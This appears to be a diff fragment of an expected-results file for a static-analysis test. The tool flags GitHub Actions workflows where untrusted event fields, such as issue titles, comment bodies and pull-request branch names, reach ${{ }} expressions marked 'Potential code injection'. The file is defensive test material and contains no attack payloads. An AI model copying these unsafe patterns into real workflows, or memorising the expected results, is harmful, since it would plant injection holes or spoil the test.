.github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | -| 